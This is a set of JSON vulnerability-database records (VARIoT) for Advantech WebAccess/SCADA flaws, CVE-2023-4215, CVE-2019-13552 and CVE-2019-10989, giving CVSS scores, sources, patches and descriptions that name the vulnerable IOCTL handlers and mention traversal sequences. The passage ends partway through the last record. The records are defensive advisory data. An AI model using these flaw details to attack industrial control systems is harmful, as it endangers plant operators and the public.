"version 9.1.3" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2023-003824" }, { "db": "NVD", "id": "CVE-2023-4215" } ] }, "cve": "CVE-2023-4215", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2023-4215", "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ics-cert@hq.dhs.gov", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.8, "id": "CVE-2023-4215", "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "OTHER", "availabilityImpact": "High", "baseScore": 8.6, "baseSeverity": "High", "confidentialityImpact": "Low", "exploitabilityScore": null, "id": "JVNDB-2023-003824", "impactScore": null, "integrityImpact": "Low", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2023-4215", "trust": 1.0, "value": "HIGH" }, { "author": "ics-cert@hq.dhs.gov", "id": "CVE-2023-4215", "trust": 1.0, "value": "MEDIUM" }, { "author": "OTHER", "id": "JVNDB-2023-003824", "trust": 0.8, "value": "High" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2023-003824" }, { "db": "NVD", "id": "CVE-2023-4215" }, { "db": "NVD", "id": "CVE-2023-4215" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess version 9.1.3 contains an exposure of sensitive information to an unauthorized actor vulnerability that could leak user credentials. Advantech Provided by the company WebAccess The following vulnerabilities exist in. It was * information leak (CWE-200) - CVE-2023-4215If the vulnerability is exploited, it may be affected as follows. It was * When configuring or changing your account information on that device; Cloud Agent Debug User credentials are stolen using the service", "sources": [ { "db": "NVD", "id": "CVE-2023-4215" }, { "db": "JVNDB", "id": "JVNDB-2023-003824" } ], "trust": 1.62 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2023-4215", "trust": 2.6 }, { "db": "ICS CERT", "id": "ICSA-23-285-15", "trust": 1.8 }, { "db": "JVN", "id": "JVNVU93637774", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2023-003824", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2023-003824" }, { "db": "NVD", "id": "CVE-2023-4215" } ] }, "id": "VAR-202310-0320", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.43470696 }, "last_update_date": "2024-10-25T23:34:56.875000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "WebAccess/SCADA", "trust": 0.8, "url": "https://www.advantech.com/en/support/details/installation?id=1-MS9MJV" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2023-003824" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 }, { "problemtype": "CWE-1295", "trust": 1.0 }, { "problemtype": "information leak (CWE-200) [ others ]", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2023-003824" }, { "db": "NVD", "id": "CVE-2023-4215" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.8, "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-285-15" }, { "trust": 0.8, "url": "https://jvn.jp/vu/jvnvu93637774/index.html" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2023-4215" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2023-003824" }, { "db": "NVD", "id": "CVE-2023-4215" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "JVNDB", "id": "JVNDB-2023-003824" }, { "db": "NVD", "id": "CVE-2023-4215" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-10-16T00:00:00", "db": "JVNDB", "id": "JVNDB-2023-003824" }, { "date": "2023-10-17T00:15:11.327000", "db": "NVD", "id": "CVE-2023-4215" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2024-05-22T07:49:00", "db": "JVNDB", "id": "JVNDB-2023-003824" }, { "date": "2024-10-24T17:15:14.653000", "db": "NVD", "id": "CVE-2023-4215" } ] }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech\u00a0 Made \u00a0WebAccess\u00a0 information disclosure vulnerability in", "sources": [ { "db": "JVNDB", "id": "JVNDB-2023-003824" } ], "trust": 0.8 } }
var-201909-1518
Vulnerability from variot
In WebAccess versions 8.4.1 and prior, multiple command injection vulnerabilities are caused by a lack of proper validation of user-supplied data and may allow arbitrary file deletion and remote code execution. WebAccess Is OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within bwrunmie.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess is a set of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 2.1, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.4.1" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.4.1" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "38c31d8a-9fc9-46ad-a7ff-1a442f559682" }, { "db": "ZDI", "id": "ZDI-19-846" }, { "db": "ZDI", "id": "ZDI-19-845" }, { "db": "ZDI", "id": "ZDI-19-844" }, { "db": "CNVD", "id": "CNVD-2019-32468" }, { "db": "JVNDB", "id": "JVNDB-2019-009506" }, { "db": "NVD", "id": "CVE-2019-13552" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-009506" } ] }, "credits": { "_id": null, "data": "Mat Powell of Trend Micro Zero Day Initiative", "sources": [ { "db": "ZDI", "id": "ZDI-19-846" }, { "db": "ZDI", "id": "ZDI-19-845" }, { "db": "ZDI", "id": "ZDI-19-844" }, { "db": "CNNVD", "id": "CNNVD-201909-834" } ], "trust": 2.7 }, "cve": "CVE-2019-13552", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "CVE-2019-13552", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "CNVD-2019-32468", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "38c31d8a-9fc9-46ad-a7ff-1a442f559682", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "VHN-145410", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:S/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "id": "CVE-2019-13552", "impactScore": 1.4, "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.4, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.0" }, { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.8, "id": "CVE-2019-13552", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 8.8, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2019-13552", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "Low", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2019-13552", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 0.7, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "CVE-2019-13552", "trust": 1.4, "value": "MEDIUM" }, { "author": "nvd@nist.gov", "id": "CVE-2019-13552", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2019-13552", "trust": 0.8, "value": "High" }, { "author": "ZDI", "id": "CVE-2019-13552", "trust": 0.7, "value": "CRITICAL" }, { "author": "CNVD", "id": "CNVD-2019-32468", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201909-834", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "38c31d8a-9fc9-46ad-a7ff-1a442f559682", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-145410", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "38c31d8a-9fc9-46ad-a7ff-1a442f559682" }, { "db": "ZDI", "id": "ZDI-19-846" }, { "db": "ZDI", "id": "ZDI-19-845" }, { "db": "ZDI", "id": "ZDI-19-844" }, { "db": "CNVD", "id": "CNVD-2019-32468" }, { "db": "VULHUB", "id": "VHN-145410" }, { "db": "JVNDB", "id": "JVNDB-2019-009506" }, { "db": "CNNVD", "id": "CNNVD-201909-834" }, { "db": "NVD", "id": "CVE-2019-13552" } ] }, "description": { "_id": null, "data": "In WebAccess versions 8.4.1 and prior, multiple command injection vulnerabilities are caused by a lack of proper validation of user-supplied data and may allow arbitrary file deletion and remote code execution. WebAccess Is OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within bwrunmie.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess is a set of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment", "sources": [ { "db": "NVD", "id": "CVE-2019-13552" }, { "db": "JVNDB", "id": "JVNDB-2019-009506" }, { "db": "ZDI", "id": "ZDI-19-846" }, { "db": "ZDI", "id": "ZDI-19-845" }, { "db": "ZDI", "id": "ZDI-19-844" }, { "db": "CNVD", "id": "CNVD-2019-32468" }, { "db": "IVD", "id": "38c31d8a-9fc9-46ad-a7ff-1a442f559682" }, { "db": "VULHUB", "id": "VHN-145410" } ], "trust": 4.32 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2019-13552", "trust": 5.4 }, { "db": "ICS CERT", "id": "ICSA-19-260-01", "trust": 3.1 }, { "db": "ZDI", "id": "ZDI-19-846", "trust": 1.3 }, { "db": "CNNVD", "id": "CNNVD-201909-834", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2019-32468", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2019-009506", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9271", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9270", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-19-845", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9269", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-19-844", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2019.3558", "trust": 0.6 }, { "db": "IVD", "id": "38C31D8A-9FC9-46AD-A7FF-1A442F559682", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-145410", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "38c31d8a-9fc9-46ad-a7ff-1a442f559682" }, { "db": "ZDI", "id": "ZDI-19-846" }, { "db": "ZDI", "id": "ZDI-19-845" }, { "db": "ZDI", "id": "ZDI-19-844" }, { "db": "CNVD", "id": "CNVD-2019-32468" }, { "db": "VULHUB", "id": "VHN-145410" }, { "db": "JVNDB", "id": "JVNDB-2019-009506" }, { "db": "CNNVD", "id": "CNNVD-201909-834" }, { "db": "NVD", "id": "CVE-2019-13552" } ] }, "id": "VAR-201909-1518", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "38c31d8a-9fc9-46ad-a7ff-1a442f559682" }, { "db": "CNVD", "id": "CNVD-2019-32468" }, { "db": "VULHUB", "id": "VHN-145410" } ], "trust": 1.33470696 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "38c31d8a-9fc9-46ad-a7ff-1a442f559682" }, { "db": "CNVD", "id": "CNVD-2019-32468" } ] }, "last_update_date": "2024-11-23T22:48:14.608000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 2.1, "url": "https://www.us-cert.gov/ics/advisories/icsa-19-260-01" }, { "title": "Advantech WebAccess", "trust": 0.8, "url": "https://www.advantech.co.jp/industrial-automation/webaccess" }, { "title": "Advantech WebAccess command injection vulnerability patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/181511" }, { "title": "Advantech WebAccess Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=98363" } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-846" }, { "db": "ZDI", "id": "ZDI-19-845" }, { "db": "ZDI", "id": "ZDI-19-844" }, { "db": "CNVD", "id": "CNVD-2019-32468" }, { "db": "JVNDB", "id": "JVNDB-2019-009506" }, { "db": "CNNVD", "id": "CNNVD-201909-834" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-77", "trust": 1.0 }, { "problemtype": "CWE-78", "trust": 0.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-145410" }, { "db": "JVNDB", "id": "JVNDB-2019-009506" }, { "db": "NVD", "id": "CVE-2019-13552" } ] }, "references": { "_id": null, "data": [ { "trust": 5.2, "url": "https://www.us-cert.gov/ics/advisories/icsa-19-260-01" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13552" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-13552" }, { "trust": 0.6, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-846/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.3558/" } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-846" }, { "db": "ZDI", "id": "ZDI-19-845" }, { "db": "ZDI", "id": "ZDI-19-844" }, { "db": "CNVD", "id": "CNVD-2019-32468" }, { "db": "VULHUB", "id": "VHN-145410" }, { "db": "JVNDB", "id": "JVNDB-2019-009506" }, { "db": "CNNVD", "id": "CNNVD-201909-834" }, { "db": "NVD", "id": "CVE-2019-13552" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "38c31d8a-9fc9-46ad-a7ff-1a442f559682", "ident": null }, { "db": "ZDI", "id": "ZDI-19-846", "ident": null }, { "db": "ZDI", "id": "ZDI-19-845", "ident": null }, { "db": "ZDI", "id": "ZDI-19-844", "ident": null }, { "db": "CNVD", "id": "CNVD-2019-32468", "ident": null }, { "db": "VULHUB", "id": "VHN-145410", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2019-009506", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201909-834", "ident": null }, { "db": "NVD", "id": "CVE-2019-13552", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2019-09-21T00:00:00", "db": "IVD", "id": "38c31d8a-9fc9-46ad-a7ff-1a442f559682", "ident": null }, { "date": "2019-09-17T00:00:00", "db": "ZDI", "id": "ZDI-19-846", "ident": null }, { "date": "2019-09-17T00:00:00", "db": "ZDI", "id": "ZDI-19-845", "ident": null }, { "date": "2019-09-17T00:00:00", "db": "ZDI", "id": "ZDI-19-844", "ident": null }, { "date": "2019-09-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-32468", "ident": null }, { "date": "2019-09-18T00:00:00", "db": "VULHUB", "id": "VHN-145410", "ident": null }, { "date": "2019-09-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-009506", "ident": null }, { "date": "2019-09-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201909-834", "ident": null }, { "date": "2019-09-18T21:15:13.017000", "db": "NVD", "id": "CVE-2019-13552", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2019-09-17T00:00:00", "db": "ZDI", "id": "ZDI-19-846", "ident": null }, { "date": "2019-09-17T00:00:00", "db": "ZDI", "id": "ZDI-19-845", "ident": null }, { "date": "2019-09-17T00:00:00", "db": "ZDI", "id": "ZDI-19-844", "ident": null }, { "date": "2019-09-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-32468", "ident": null }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-145410", "ident": null }, { "date": "2019-09-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-009506", "ident": null }, { "date": "2021-10-29T00:00:00", "db": "CNNVD", "id": "CNNVD-201909-834", "ident": null }, { "date": "2024-11-21T04:25:07.977000", "db": "NVD", "id": "CVE-2019-13552", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201909-834" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess Command injection vulnerability", "sources": [ { "db": "IVD", "id": "38c31d8a-9fc9-46ad-a7ff-1a442f559682" }, { "db": "CNVD", "id": "CNVD-2019-32468" }, { "db": "CNNVD", "id": "CNNVD-201909-834" } ], "trust": 1.4 }, "type": { "_id": null, "data": "command injection", "sources": [ { "db": "CNNVD", "id": "CNNVD-201909-834" } ], "trust": 0.6 } }
var-201906-1027
Vulnerability from variot
In WebAccess/SCADA Versions 8.3.5 and prior, multiple heap-based buffer overflow vulnerabilities are caused by a lack of proper validation of the length of user-supplied data. Exploitation of these vulnerabilities may allow remote code execution. Note: A different vulnerability than CVE-2019-10991. WebAccess/SCADA Contains a buffer error vulnerability. This vulnerability CVE-2019-10991 Is a different vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x11372 IOCTL in the webvrpcs process. An attacker can leverage this vulnerability to execute code under the context of Administrator. Advantech WebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess/SCADA is prone to the following security vulnerabilities: 1. A directory-traversal vulnerability 2. Multiple stack-based buffer-overflow vulnerabilities 3. Multiple heap-based buffer-overflow vulnerabilities 4. Multiple remote-code execution vulnerabilities An attacker can exploit these issues to execute arbitrary code in the context of the application, modify and delete files, use directory-traversal sequences (â??../â??) to retrieve arbitrary files, escalate privileges and perform certain unauthorized actions or obtain sensitive information. This may aid in further attacks. Advantech WebAccess/SCADA Versions 8.3.5 and prior versions are vulnerable
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.3.5" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 1.4, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess/scada", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.5" }, { "_id": null, "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3.5" }, { "_id": null, "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3.4" }, { "_id": null, "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3.2" }, { "_id": null, "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "_id": null, "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.0" }, { "_id": null, "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "7.2" }, { "_id": null, "model": "webaccess/scada", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.4.1" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "a3a80884-2713-49f5-a1e2-0b387c0701cc" }, { "db": "ZDI", "id": "ZDI-19-591" }, { "db": "ZDI", "id": "ZDI-19-590" }, { "db": "CNVD", "id": "CNVD-2019-32464" }, { "db": "BID", "id": "108923" }, { "db": "JVNDB", "id": "JVNDB-2019-005814" }, { "db": "NVD", "id": "CVE-2019-10989" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-005814" } ] }, "credits": { "_id": null, "data": "Mat Powell of Trend Micro Zero Day Initiative", "sources": [ { "db": "ZDI", "id": "ZDI-19-591" }, { "db": "ZDI", "id": "ZDI-19-590" } ], "trust": 1.4 }, "cve": "CVE-2019-10989", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2019-10989", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2019-32464", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "a3a80884-2713-49f5-a1e2-0b387c0701cc", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-142590", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2019-10989", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.4, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2019-10989", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 9.8, "baseSeverity": "Critical", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2019-10989", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", 